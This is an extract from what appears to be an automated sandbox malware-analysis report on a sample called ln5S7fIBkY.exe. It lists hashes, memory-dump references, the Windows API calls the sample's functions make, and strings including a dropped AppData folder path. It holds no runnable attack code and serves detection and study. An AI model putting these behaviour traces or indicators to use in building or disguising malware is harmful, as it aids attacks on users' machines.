                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                    • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                    • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                    • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                    • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                                    • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                    • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                                                    APIs
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,76F923A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,76F923A0), ref: 0040535A
                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      • Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                      • Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D
                                                                      • Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
                                                                      • Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755
                                                                      • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2972824698-0
                                                                    • Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                    • Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
                                                                    • Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                    • Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                    • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                    • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004050AB
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                    • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                    • ShowWindow.USER32(00000000), ref: 0040525C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                    • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                    • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                    • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                    • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404872
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                      • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                      • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                      • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00403347,C:\Users\user\AppData\Local\Temp\,76F93420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                    • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                      • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                      • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                      • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                    • API String ID: 2624150263-3761743582
                                                                    • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                    • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                    • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                    • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004021C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                                                    • API String ID: 542301482-2745823915
                                                                    • Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                    • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                                                    • Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                                                    • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                                                    • GetSysColor.USER32(?), ref: 004044AD
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                    • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                    • SendMessageW.USER32(00000000), ref: 00404550
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                    • SetCursor.USER32(00000000), ref: 004045CF
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                    • SetCursor.USER32(00000000), ref: 004045EB
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: : Completed$DC@$N
                                                                    • API String ID: 3103080414-907034273
                                                                    • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                    • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                    • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                    • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                    • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                    • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                    • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                    APIs
